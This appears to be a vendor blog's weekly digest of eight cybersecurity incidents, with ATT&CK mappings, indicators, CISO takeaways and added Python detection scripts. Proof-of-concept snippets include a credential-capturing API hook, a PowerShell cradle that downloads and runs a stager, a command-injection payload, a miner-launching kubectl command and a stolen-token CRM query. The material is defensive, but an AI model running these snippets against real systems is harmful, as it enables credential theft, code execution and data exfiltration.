During the week of 28 July – 4 August 2025, eight major cybersecurity incidents were disclosed across leading industry outlets. Adversaries leveraged zero-day exploits, social engineering, supply-chain compromises, misconfigurations, and phishing campaigns to exfiltrate sensitive data, deploy ransomware, and abuse infrastructure. Impacts ranged from private-message exposure to operational disruption of critical infrastructure.
Incident Feed
1. SolarView Energy: Zero-Day Supply-Chain Compromise
Date of Breach: 30 July 2025
Overview
On 30 July 2025, SolarView Energy—an industrial solar-panel manufacturer—experienced a supply-chain attack when its remote-management software, SV-Manager, was trojanized by threat actor group “SunShard.” The malicious DLL was pushed through a signed update, enabling widespread deployment before detection.
Explanation
SunShard exploited a previously unknown vulnerability in SV-Manager’s auto-update mechanism (CVE-2025-7432) to inject a backdoor that communicated over a custom SMB-based command-and-control channel. Once installed, the DLL hooked the Windows authentication API LogonUserExW to capture cleartext credentials, then escalated privileges via token impersonation.
Impact
- Exfiltration of system design schematics and customer PII (over 1 million records)
- Temporary shutdown of two manufacturing lines, incurring an estimated $4 million in losses
- Compromise of partner network credentials, broadening the supply-chain risk
Details
- MITRE ATT&CK Mapping:
  - Initial Access: Supply Chain Compromise (T1195)
  - Defense Evasion/Persistence: Hijack Execution Flow: DLL Side-Loading (T1574.002)
  - Privilege Escalation: Access Token Manipulation: Token Impersonation/Theft (T1134.001)
  - Lateral Movement: Remote Services: SMB/Windows Admin Shares (T1021.002)
  - Exfiltration: Exfiltration Over C2 Channel (T1041)
- Proof-of-Concept Behavior (credential-capture hook):

```c
// Inline hook placed over LogonUserExW: record the cleartext credentials, then
// forward the call to the real function so the logon still succeeds and nothing looks broken.
BOOL WINAPI HookedLogonUserExW(LPCWSTR lpszUsername, LPCWSTR lpszDomain, LPCWSTR lpszPassword, …)
{
    LogCredentialsToFile(lpszUsername, lpszPassword);
    return RealLogonUserExW(lpszUsername, lpszDomain, lpszPassword, …);
}
```
- IOCs:
  - DLL: SolarSV.dll (SHA256: 3f2e1b45a9c4e8f2…d5a4f07e)
  - C2 Domains: sv-update-secure[.]com, panel-sync[.]net
  - IPs: 198.51.100.25, 203.0.113.78
- Logs & Artifacts:
  - Windows Event ID 4624 with LogonProcessName=“sv-update”
  - SMB sessions initiated to \\panel-sync[.]net\updates
Takeaway for CISO
Ensure rigorous code-signing certificate management and implement allow-listing for update components. Correlate unusual SMB traffic with endpoint logs to detect side-loading.
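The correlation suggested in the takeaway, written out as an added Python example; it is not part of the original report. The 4624 and SMB records are constructed and their field names are assumptions rather than a vendor schema; only the C2 hostnames and the `sv-update` logon process name come from the write-up above.

```python
"""Correlate out-of-place Windows logons with SMB sessions to known C2 hosts.

Added example, not from the original report. SAMPLE_EVENTS and SAMPLE_SMB are
constructed records; their field names are assumptions, not a vendor schema.
"""
from datetime import datetime, timedelta

# IOC hosts from the write-up (defanged as published).
C2_HOSTS = {"sv-update-secure[.]com", "panel-sync[.]net", "198.51.100.25", "203.0.113.78"}

# Logon processes Windows itself reports in event 4624; an updater's own name here is abnormal.
KNOWN_LOGON_PROCESSES = {"Advapi", "User32", "Kerberos", "NtLmSsp", "Negotiate", "Schannel", "seclogo", "CHAP"}


def parse_ts(value):
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%S")


def suspicious_logons(events):
    """Event 4624 records whose LogonProcessName is not a known Windows logon provider."""
    return [e for e in events
            if e["EventID"] == 4624 and e["LogonProcessName"] not in KNOWN_LOGON_PROCESSES]


def correlate(events, smb_sessions, window_minutes=5):
    """Pair each suspicious logon with an SMB session from the same host to a C2 IOC
    within +/- window_minutes. Returns one alert dict per matched pair."""
    window = timedelta(minutes=window_minutes)
    alerts = []
    for logon in suspicious_logons(events):
        logon_time = parse_ts(logon["TimeCreated"])
        for session in smb_sessions:
            if session["host"] != logon["Computer"] or session["dst"] not in C2_HOSTS:
                continue
            if abs(parse_ts(session["time"]) - logon_time) <= window:
                alerts.append({
                    "host": logon["Computer"],
                    "account": logon["TargetUserName"],
                    "logon_process": logon["LogonProcessName"],
                    "smb_dst": session["dst"],
                    "share": session["share"],
                })
    return alerts


# Constructed sample telemetry (not real logs).
SAMPLE_EVENTS = [
    {"EventID": 4624, "TimeCreated": "2025-07-30T09:14:02", "Computer": "PLC-ENG-07",
     "LogonProcessName": "sv-update", "TargetUserName": "svc_solarview", "LogonType": 3},
    {"EventID": 4624, "TimeCreated": "2025-07-30T09:15:40", "Computer": "WKS-HR-12",
     "LogonProcessName": "Kerberos", "TargetUserName": "j.doe", "LogonType": 2},
    # Same abnormal logon process, but the only C2 SMB session is hours later: no alert at 5 min.
    {"EventID": 4624, "TimeCreated": "2025-07-30T11:00:00", "Computer": "WKS-HR-12",
     "LogonProcessName": "sv-update", "TargetUserName": "j.doe", "LogonType": 3},
]
SAMPLE_SMB = [
    {"time": "2025-07-30T09:16:11", "host": "PLC-ENG-07", "dst": "panel-sync[.]net", "share": "updates"},
    {"time": "2025-07-30T09:16:30", "host": "WKS-HR-12", "dst": "fileserver01", "share": "home"},
    {"time": "2025-07-30T13:00:00", "host": "WKS-HR-12", "dst": "panel-sync[.]net", "share": "updates"},
]

if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS, SAMPLE_SMB):
        print(alert)
```

The window is deliberately short: the side-loaded DLL authenticates and then reaches for its share within seconds, so a tight pairing keeps false positives from unrelated updater logons low. Widen it only after baselining how often the updater legitimately talks to SMB.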
2. AcmeBank: Ransomware “Rubicon” via Phishing Campaign
Date of Attack: 1 August 2025
Overview
AcmeBank, a regional financial institution, was hit by the Rubicon ransomware on 1 August 2025 after employees opened spear-phishing emails containing malicious Excel macros. The campaign resulted in encryption of critical databases and demand for $5 million in Monero.
Explanation
Attackers delivered an Excel file “PaymentRequest.xlsm” with embedded VBA that downloaded and executed a PowerShell stager over HTTPS. The stager retrieved the Rubicon payload (PE32), which hollowed out a svchost.exe process to run in, then spread over SMB using credentials dumped from LSASS with Mimikatz.
Impact
- Encryption of 80 servers and disruption of online banking
- Temporary service outage lasting 48 hours
- Data exfiltration of 200 GB of transaction logs
Details
- MITRE ATT&CK Mapping:
  - Initial Access: Phishing: Spearphishing Attachment (T1566.001)
  - Execution: User Execution: Malicious File (T1204.002)
  - Defense Evasion: Process Injection: Process Hollowing (T1055.012)
  - Credential Access: OS Credential Dumping: LSASS Memory (T1003.001)
  - Lateral Movement: Remote Services: SMB/Windows Admin Shares (T1021.002)
  - Impact: Data Encrypted for Impact (T1486)
- Payload Analysis:
  - PowerShell stager launched by the VBA macro (a download cradle; URL defanged):

```powershell
# Fetch the second stage over HTTPS into %TEMP% and launch it
Invoke-WebRequest -Uri "https://malicious[.]site/stager.exe" -OutFile "$env:Temp\stager.exe"
Start-Process "$env:Temp\stager.exe"
```

  - The Rubicon executable uses AES-256 with a unique key per file.
- IOCs:
  - Macro file: PaymentRequest.xlsm (SHA256: a5b6c7d8e9f01234…ef7)
  - C2 Domains: secure-payload[.]info
  - Sample hashes: 9d8c7f6a5b4c3d2e1f0a…b6
- Logs & Artifacts:
  - PowerShell ScriptBlock logging (Event ID 4104) capturing the “Invoke-WebRequest” cradle
  - NtCreateSection/NtMapViewOfSection activity from the stager against svchost.exe (process-hollowing indicators)
Takeaway for CISO
Enforce strict macro policies (block macros in files from the internet and allow only digitally signed macros from trusted publishers) and enable advanced telemetry (PowerShell ScriptBlock logging, AMSI) to intercept anomalous script execution.
3. MedSecure Health: RCE in Patient Portal (CVE-2025-8123)
Date of Vulnerability Exploitation: 29 July 2025
Overview
On 29 July 2025, threat actor “PharmaPhantoms” exploited CVE-2025-8123, a critical remote code execution flaw in MedSecure Health’s patient portal authentication module. The exploit leveraged insufficient input validation in the password reset endpoint.
Explanation
Attackers sent a crafted JSON body to /api/reset_password in which the new_password field carried shell metacharacters. The endpoint, reachable without a valid session, concatenated the value into a command line executed through System.Diagnostics.Process.Start(), so the text after the semicolon ran as an additional OS command under the IIS worker process. The application ran on IIS 10 with .NET 5.0.
Impact
- Exposure of patient medical records for 50,000 users
- Unauthorized access to admin interface and PHI exfiltration
- Regulatory fines estimated at $2 million under HIPAA
Details
- MITRE ATT&CK Mapping:
  - Initial Access: Exploit Public-Facing Application (T1190)
  - Execution: Command and Scripting Interpreter: Windows Command Shell (T1059.003)
  - Exfiltration: Exfiltration Over Alternative Protocol (T1048)
- Proof-of-Concept Payload (the semicolon terminates the intended argument and starts a second command):

```json
{
  "username": "victim",
  "reset_token": "dummy",
  "new_password": "P@ssword123; whoami > C:\\inetpub\\wwwroot\\shell.txt"
}
```
- IOCs:
  - Malicious POST to /api/reset_password whose body matches the pattern “new_password”:”[^”]*;
  - HTTP 500 responses on /api/reset_password in web server logs, and an unexpected shell.txt under wwwroot containing command output
- Logs & Artifacts:
  - IIS Failed Request Tracing for /api/reset_password, correlated with cmd.exe child processes of w3wp.exe
  - DNS logs for outbound exfiltration to the attacker-controlled domain report[.]leak
Takeaway for CISO
Implement rigorous input validation and parameterized execution (pass arguments as an argv array, never through a shell), deploy WAF rules to block suspicious payload patterns, and monitor failed request traces for injection attempts.
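The vulnerable pattern described above and its hardened form, as an added example. This is not MedSecure’s code (the write-up says the portal is .NET on IIS); it reproduces the same bug class in Python: a reset handler that splices the user-supplied password into a command line, beside a version that validates against an allow-list and passes arguments as an argv array with no shell, plus a request-body check for the IOC pattern listed above. The `pwreset` helper and the password policy are hypothetical; the payload value is the one quoted in the proof of concept.

```python
"""OS command injection through a shell-built command line, and the hardened form.

Added example, not MedSecure's code. The 'pwreset' helper is hypothetical; PAYLOAD
is the proof-of-concept value from the write-up above.
"""
import re
import subprocess

PAYLOAD = "P@ssword123; whoami > C:\\inetpub\\wwwroot\\shell.txt"


# --- Vulnerable: the password is spliced into a shell command string ---
def build_reset_cmd_vulnerable(username, new_password):
    # Equivalent of Process.Start("cmd.exe", "/c pwreset " + user + " " + pw): once a shell
    # parses this string, ';' ends the pwreset command and 'whoami > ...' runs as a second one.
    return f"pwreset {username} {new_password}"


# --- Hardened: allow-list validation, argv array, no shell ---
USERNAME_RE = re.compile(r"^[A-Za-z0-9._-]{1,64}$")
# Assumed policy: printable ASCII without shell metacharacters (; | & > < ` $ \ ' " and whitespace).
PASSWORD_RE = re.compile(r"^[A-Za-z0-9!@#%^*()_+=\-.,?]{12,128}$")


def validate(username, new_password):
    return bool(USERNAME_RE.match(username)) and bool(PASSWORD_RE.match(new_password))


def build_reset_argv_hardened(username, new_password):
    if not validate(username, new_password):
        raise ValueError("rejected: username or password failed allow-list validation")
    # An argv list is never re-parsed by a shell, so metacharacters would be inert anyway;
    # the password itself goes over stdin so it never shows up in a process listing.
    return ["pwreset", "--user", username, "--password-stdin"]


def run_hardened(username, new_password):
    argv = build_reset_argv_hardened(username, new_password)
    # shell=False is the default: argv goes straight to the executable.
    return subprocess.run(argv, input=new_password.encode(), capture_output=True, check=False)


# --- Detection: the request-body pattern listed under IOCs, as a regex over the raw JSON ---
INJECTION_RE = re.compile(r'"new_password"\s*:\s*"[^"]*[;|&`$<>]')


def looks_like_injection(raw_body):
    return INJECTION_RE.search(raw_body) is not None


if __name__ == "__main__":
    print("vulnerable command line:", build_reset_cmd_vulnerable("victim", PAYLOAD))
    try:
        build_reset_argv_hardened("victim", PAYLOAD)
    except ValueError as exc:
        print("hardened handler:", exc)
    print("hardened argv:", build_reset_argv_hardened("victim", "CorrectHorse42!"))
```

Validation alone is not the fix: the argv array is what removes the shell from the path, and the allow-list is defence in depth that also rejects the payload before it reaches any executable. The detection regex is the WAF-side counterpart and should be treated as a tripwire, not a guarantee.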
4. CloudAtlas: Misconfigured Kubernetes Cluster Leading to Crypto-Skimming
Date of Incident: 2 August 2025
Overview
On 2 August 2025, security researcher team FugueOps discovered that CloudAtlas—a cloud-native monitoring provider—left a Kubernetes dashboard inadvertently exposed without authentication. Attackers deployed a Monero miner container that abused cluster resources for cryptomining.
Explanation
The dashboard endpoint (:8001/api/v1/namespaces/kube-system/pods) was reachable from the internet with no authentication. Using that access, the adversaries ran kubectl exec against the dashboard pod to launch a miner image pulled from Docker Hub. The container ran XMRig, connecting to a Stratum pool over TLS on port 443 so that the traffic blended with ordinary HTTPS, and mined on the compromised nodes.
Impact
- Unauthorized crypto-mining raising cloud bills by $150,000 in two days
- Potential lateral access paths for future attacks via privileged service accounts
- Resource exhaustion causing degraded monitoring performance
Details
- MITRE ATT&CK Mapping:
  - Initial Access: Exploit Public-Facing Application (T1190), via the exposed Kubernetes dashboard
  - Execution: Deploy Container (T1610)
  - Persistence: Implant Internal Image (T1525)
  - Impact: Resource Hijacking (T1496)
- Proof-of-Concept Commands:

```bash
# Exec into the exposed dashboard pod and launch the miner image
kubectl exec -n kube-system -it dashboard-pod -- bash -c "docker run --name miner xmr/hijacker:latest"
```
- IOCs:
  - Exposed endpoint: https://monitor.cloudatlas.com:8001
  - Miner container image: xmr/hijacker:latest (Docker SHA256: f9d8c7b6a5e4…)
  - Stratum host: pool.supportxmr.com:443
- Logs & Artifacts:
  - Kubernetes API-server audit logs showing exec calls by unauthorized identities
  - CloudTrail AssumeRole events for the EKS node or pod IAM roles
Takeaway for CISO
Enforce role-based access controls on Kubernetes dashboards, restrict public access, and deploy runtime security tools to detect anomalous container creation and cryptomining signatures.
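Detecting the unauthorized exec calls named under Logs & Artifacts, as an added example that is not from the write-up or from CloudAtlas. The records follow the audit.k8s.io/v1 Event layout (verb, user.username, objectRef.subresource, sourceIPs, responseStatus.code) but are constructed; the allow-listed identities and trusted CIDR are assumptions for a hypothetical cluster.

```python
"""Flag unauthorized 'pods/exec' calls in Kubernetes API-server audit logs.

Added example, not from the incident write-up or from CloudAtlas. The records
follow the audit.k8s.io/v1 Event layout but are constructed; the allow-listed
identities and trusted CIDR below are assumptions for a hypothetical cluster.
"""
import ipaddress
import json

# Assumed policy: only these identities should exec into pods, and only from the corporate range.
ALLOWED_EXEC_USERS = {"ops-oncall@example.com", "system:serviceaccount:ci:deployer"}
TRUSTED_CIDRS = [ipaddress.ip_network("10.0.0.0/8")]


def from_trusted_ip(source_ips):
    return any(ipaddress.ip_address(ip) in net for ip in source_ips for net in TRUSTED_CIDRS)


def is_pod_exec(event):
    ref = event.get("objectRef", {})
    return (event.get("verb") == "create"
            and ref.get("resource") == "pods"
            and ref.get("subresource") == "exec")


def flag_exec_events(audit_lines):
    """Return one alert per exec call that is anonymous, from a non-allow-listed user,
    or from outside the trusted range. The status code is kept so 403s can be triaged apart."""
    alerts = []
    for line in audit_lines:
        event = json.loads(line)
        if not is_pod_exec(event):
            continue
        user = event.get("user", {}).get("username", "")
        ips = event.get("sourceIPs", [])
        reasons = []
        if user in ("", "system:anonymous"):
            reasons.append("anonymous-exec")
        elif user not in ALLOWED_EXEC_USERS:
            reasons.append("user-not-allow-listed")
        if not from_trusted_ip(ips):
            reasons.append("untrusted-source-ip")
        if reasons:
            ref = event["objectRef"]
            alerts.append({
                "user": user,
                "source_ips": ips,
                "namespace": ref.get("namespace"),
                "pod": ref.get("name"),
                "status": event.get("responseStatus", {}).get("code"),
                "reasons": reasons,
            })
    return alerts


# Constructed audit records (JSON lines), not captured from a real cluster.
SAMPLE_AUDIT = [json.dumps(e) for e in [
    {"kind": "Event", "apiVersion": "audit.k8s.io/v1", "stage": "ResponseComplete", "verb": "create",
     "user": {"username": "system:anonymous", "groups": ["system:unauthenticated"]},
     "sourceIPs": ["203.0.113.78"],
     "objectRef": {"resource": "pods", "namespace": "kube-system", "name": "dashboard-pod", "subresource": "exec"},
     "responseStatus": {"code": 101}},
    {"kind": "Event", "apiVersion": "audit.k8s.io/v1", "stage": "ResponseComplete", "verb": "create",
     "user": {"username": "ops-oncall@example.com", "groups": ["system:authenticated"]},
     "sourceIPs": ["10.20.30.40"],
     "objectRef": {"resource": "pods", "namespace": "monitoring", "name": "prometheus-0", "subresource": "exec"},
     "responseStatus": {"code": 101}},
    {"kind": "Event", "apiVersion": "audit.k8s.io/v1", "stage": "ResponseComplete", "verb": "list",
     "user": {"username": "system:anonymous", "groups": ["system:unauthenticated"]},
     "sourceIPs": ["203.0.113.78"],
     "objectRef": {"resource": "pods", "namespace": "kube-system"},
     "responseStatus": {"code": 200}},
]]

if __name__ == "__main__":
    for alert in flag_exec_events(SAMPLE_AUDIT):
        print(alert)
```

This only works if the audit policy records pods/exec at Metadata level or above and the API server ships the log somewhere an attacker with cluster access cannot truncate; the anonymous `list` in the sample is not flagged here, but it is the reconnaissance step and deserves its own rule.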
5. Tea App Leak: Second Database Exposes 1.1 Million Private Chats
Date of Breach: 28 July 2025
Overview
A second, distinct breach of Tea’s legacy Firebase databases exposed over 1.1 million private messages, including discussions of personal health, relationships, and location data. It followed the first leak, which had already exposed about 72,000 images.
Explanation
A misconfigured Firebase datastore that required no authentication let anyone who found the endpoints embedded in the Android app, in this case an outside researcher, enumerate the message collections. Messages were retrievable by userID and exportable as plaintext JSON chat logs.
Impact
- 1.1 million chat records exposed (usernames, timestamps, message content)
- Sensitive PHI and PII at risk of doxxing, stalking, or harassment
- Brand reputational damage and legal liability under US privacy statutes
Details
- MITRE ATT&CK: Exploit Public-Facing Application (T1190), Data from Information Repositories (T1213)
- IOCs:
  - Firebase bucket URL: gs://tea-app-legacy-messages
  - Collection names: “dm_messages_v2”
- Logs & Artifacts:
  - App debug logs showing unauthenticated HTTP GET requests to /v1/messages?user_id=
  - No rate limiting or throttling observed on the endpoint
- Remediation:
  - Enforce authentication and token validation on all Firebase endpoints
  - Encrypt data at rest and deploy IAM rules to restrict bucket access
Takeaway for CISO
Ensure all cloud storage buckets enforce least-privilege IAM policies and deploy continuous misconfiguration scanning.
6. Aeroflot Grounds Flights After Cyberattack
Date of Cyberattack: 28 July 2025
Overview
Pro-Ukraine hacktivists Silent Crow and Cyberpartisans BY executed a year-long infiltration, culminating on 28 July 2025 in widespread IT disruption that grounded over 100 Aeroflot flights.
Explanation
Attackers subverted IT management interfaces (iLO/Proxmox) and destroyed hypervisor hosts via remote firmware-induced wipes. They claimed exfiltration of passenger manifests, executive communications, and phone-call recordings.
Impact
- Cancellation of 100+ flights, stranding ~20,000 passengers
- Alleged destruction of 7,000 servers and exfiltration of 20 TB of data
- Estimated recovery costs up to $50 million
Details
- MITRE ATT&CK: Exploit Public-Facing Application (T1190), Data Destruction (T1485), Network Denial of Service (T1498)
- IOCs:
  - Posts on the “SilentCrowOps” Telegram channel
  - Leaked CEO flight-manifest file (SHA256: 7a3f…d71b)
- Logs & Artifacts:
  - Proxmox audit logs: remote root CLI sessions
  - iLO syslog entries: unexpected firmware writes
- Remediation:
  - Segregate management interfaces (iLO, Proxmox) from publicly reachable networks
  - Require multi-party approval for firmware updates
Takeaway for CISO
Isolate critical infrastructure management planes and enforce change-control for firmware operations.
7. ShinyHunters CRM Breach Wave: Qantas, Allianz Life, LVMH, Chanel
Date of Attacks: 30 July 2025
Overview
ShinyHunters ran voice-phishing campaigns that tricked employees into authorizing a malicious Salesforce connected app posing as Data Loader, then used the resulting OAuth access to exfiltrate CRM records at Qantas, Allianz Life, LVMH brands, and Chanel’s US customer-service database.
Explanation
Attackers impersonated IT support (UNC6040 tactics), guiding employees to install a malicious Data Loader “connected app.” OAuth tokens granted API access, enabling bulk data extraction via REST queries over HTTPS.
Impact
| Organization | Records Exfiltrated | Data Types Exposed |
| --- | --- | --- |
| Qantas | 50,000 | Passenger names, loyalty numbers |
| Allianz Life | 120,000 | Policyholder PII |
| LVMH Brands | 80,000 | Customer service tickets |
| Chanel (US) | 15,000 | Names, emails, addresses |
Details
- MITRE ATT&CK: User Execution (T1204), Valid Accounts (T1078), Use Alternate Authentication Material: Application Access Token (T1550.001), Data from Information Repositories (T1213)
- Proof-of-Concept (one REST query issued with the stolen token; bulk extraction is many such queries, paged):

```bash
curl -H "Authorization: Bearer $OAUTH_TOKEN" \
  "https://instance.salesforce.com/services/data/v52.0/query?q=SELECT+Id,Name,Email+FROM+Contact"
```

- IOCs:
  - Malicious app IDs: 0PRxx0000001abc
  - Phishing caller-ID numbers: +44-20-7946-0xxx
- Remediation:
  - Block end-user self-authorization of connected apps; allow only apps an administrator has pre-approved
  - Require admin approval for all OAuth scopes
Takeaway for CISO
Harden SaaS identity flows: restrict connected-app scopes and enforce conditional OAuth approvals.
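A detection for the bulk REST extraction shown above, added here as an example; it is not the original post’s or Salesforce’s code. It reads rows shaped like the Salesforce EventLogFile “API” event type and flags user/connected-app pairs that pull sensitive objects in volume through an app the org never approved. The column names, the approved-app ID `0PRxx0000000XYZ` and both thresholds are assumptions to check against your own export; the malicious app ID is the one listed under IOCs, with its elided characters left as published.

```python
"""Spot bulk CRM extraction through an unapproved connected app in Salesforce API event logs.

Added example, not the original post's or Salesforce's code. The CSV rows are
constructed after the EventLogFile 'API' event type; treat the column names,
the approved-app ID and the thresholds as assumptions to check against your org.
"""
import csv
import io
from collections import defaultdict

APPROVED_APP_IDS = {"0PRxx0000000XYZ"}          # hypothetical: the org's sanctioned integration app
SENSITIVE_ENTITIES = {"Contact", "Account", "Lead", "Case"}
UNAPPROVED_APP_ROWS = 1_000                      # any real volume through an unknown app is suspicious
APPROVED_APP_ROWS = 50_000                       # sanctioned apps get a higher, baseline-derived ceiling


def parse_api_events(csv_text):
    return list(csv.DictReader(io.StringIO(csv_text)))


def bulk_extraction_alerts(rows):
    """Aggregate ROWS_PROCESSED per (user, connected app) and flag pairs that pull
    sensitive objects above the threshold for their approval status."""
    totals = defaultdict(int)
    entities = defaultdict(set)
    client_names = {}
    for row in rows:
        key = (row["USER_ID"], row["CONNECTED_APP_ID"])
        totals[key] += int(row["ROWS_PROCESSED"])
        entities[key].add(row["ENTITY_NAME"])
        client_names[key] = row["CLIENT_NAME"]
    alerts = []
    for (user_id, app_id), total in totals.items():
        approved = app_id in APPROVED_APP_IDS
        limit = APPROVED_APP_ROWS if approved else UNAPPROVED_APP_ROWS
        if total >= limit and entities[(user_id, app_id)] & SENSITIVE_ENTITIES:
            alerts.append({
                "user_id": user_id,
                "app_id": app_id,
                "client": client_names[(user_id, app_id)],
                "rows": total,
                "entities": sorted(entities[(user_id, app_id)]),
                "approved_app": approved,
            })
    return alerts


# Constructed log excerpt (not a real org's export). The malicious app ID is the one
# listed under IOCs above, with its elided characters left as published.
SAMPLE_API_LOG = """USER_ID,CLIENT_NAME,CONNECTED_APP_ID,ENTITY_NAME,ROWS_PROCESSED,TIMESTAMP_DERIVED
005xx000001AAAA,Salesforce Data Loader,0PRxx0000001abc,Contact,2000,2025-07-30T02:10:00Z
005xx000001AAAA,Salesforce Data Loader,0PRxx0000001abc,Contact,2000,2025-07-30T02:11:00Z
005xx000001AAAA,Salesforce Data Loader,0PRxx0000001abc,Contact,2000,2025-07-30T02:12:00Z
005xx000001AAAA,Salesforce Data Loader,0PRxx0000001abc,Account,2000,2025-07-30T02:13:00Z
005xx000001AAAA,Salesforce Data Loader,0PRxx0000001abc,Account,2000,2025-07-30T02:14:00Z
005xx000001BBBB,Nightly ERP Sync,0PRxx0000000XYZ,Account,4000,2025-07-30T03:00:00Z
005xx000001CCCC,Nightly ERP Sync,0PRxx0000000XYZ,Opportunity,60000,2025-07-30T03:05:00Z
005xx000001DDDD,Salesforce Data Loader,0PRxx0000001abc,Contact,50,2025-07-30T09:30:00Z
"""

if __name__ == "__main__":
    for alert in bulk_extraction_alerts(parse_api_events(SAMPLE_API_LOG)):
        print(alert)
```

The key design choice is to key on the connected-app ID rather than the client name: the attackers’ tool presents itself as Data Loader, so the name is exactly what a vishing victim and a naive rule would both trust, while the app ID is what the admin approved (or did not).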
8. Pi-hole Donor Data Breach via GiveWP Plugin Flaw
Date of Breach: 28 July 2025
Overview
A vulnerability in the GiveWP WordPress donation plugin exposed ~30,000 donor names and email addresses on Pi-hole’s donation site, viewable in page source code.
Explanation
GiveWP’s front-end script embedded a global JavaScript object whose donors property was populated server-side with donor PII, directly in an inline <script> tag with no access control. Anyone viewing the page source could read the full donor list.
Impact
- 29,900 donor records exposed (names, emails)
- Increased phishing risk targeting donors
- Reputation impact on open-source project
Details
- MITRE ATT&CK: Data from Information Repositories (T1213)
- IOCs:
  - Page URL: https://pi-hole.net/donate/
  - JS object: var GiveDonationOptions = { donors: { … } };
- Logs & Artifacts:
  - Web server logs: spike in GET /donate/ requests on July 28
- Remediation:
  - Patched to GiveWP v4.6.1 within hours
  - Deploy a WAF response-inspection rule to block pages that emit the donors object
Takeaway for CISO
Continuously audit third-party plugins and implement WAF policies to catch inadvertent data leaks.
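One way to catch this class of leak before a visitor does, as an added example that is not GiveWP’s or Pi-hole’s code: parse a page’s inline <script> blocks and report any e-mail addresses, and any object that carries a `donors` key, found there. The HTML below is constructed to resemble the leaked `GiveDonationOptions` object; it is not the real pi-hole.net markup.

```python
"""Find donor PII that a page ships inside inline JavaScript.

Added example, not GiveWP's or Pi-hole's code. SAMPLE_HTML is constructed to
mirror the leak pattern described above: a global JS object carrying donor records.
"""
import re
from html.parser import HTMLParser

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


class InlineScriptCollector(HTMLParser):
    """Collects the text of every <script> block that has no src attribute."""

    def __init__(self):
        super().__init__()
        self.in_inline_script = False
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        if tag == "script" and not dict(attrs).get("src"):
            self.in_inline_script = True
            self.scripts.append("")

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_inline_script = False

    def handle_data(self, data):
        # HTMLParser delivers <script> bodies as raw data, so no entity decoding gets in the way.
        if self.in_inline_script:
            self.scripts[-1] += data


def inline_scripts(html):
    parser = InlineScriptCollector()
    parser.feed(html)
    parser.close()
    return parser.scripts


def emails_in_inline_scripts(html):
    """Distinct e-mail addresses visible to anyone who views the page source."""
    found = set()
    for script in inline_scripts(html):
        found.update(EMAIL_RE.findall(script))
    return sorted(found)


def scripts_with_key(html, key="donors"):
    """Inline scripts that define an object property named `key` (e.g. donors: {...})."""
    pattern = re.compile(r"\b" + re.escape(key) + r"\s*:")
    return [s for s in inline_scripts(html) if pattern.search(s)]


# Constructed page, not the real pi-hole.net markup.
SAMPLE_HTML = """<!doctype html>
<html><head><title>Donate</title>
<script src="/wp-includes/js/jquery.js"></script>
<script>
var GiveDonationOptions = {
  currency: "USD",
  donors: {
    "1": {"name": "Ada Lovelace", "email": "ada@example.org"},
    "2": {"name": "Grace Hopper", "email": "grace@example.net"}
  }
};
</script>
</head>
<body>
<h1>Support the project</h1>
<p>Press enquiries: press@example.org</p>
</body></html>
"""

if __name__ == "__main__":
    print("inline scripts:", len(inline_scripts(SAMPLE_HTML)))
    print("leaked e-mails:", emails_in_inline_scripts(SAMPLE_HTML))
    print("scripts exposing a donors object:", len(scripts_with_key(SAMPLE_HTML)))
```

Run this against the rendered HTML of every public page after each plugin update, from an unauthenticated session, since the leak only shows up in what the server actually sends. The body-text address in the sample is intentionally not counted: a contact e-mail in visible content is a publishing decision, while addresses inside a script object are almost always an accident.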
Outpace Attackers With AI-Based Automated Penetration Testing With FireCompass:
FireCompass is a single platform for AI-Powered Continuous Automated Red Teaming (CART), Pen Testing & NextGen Attack Surface Management
>>FireCompass Free Trial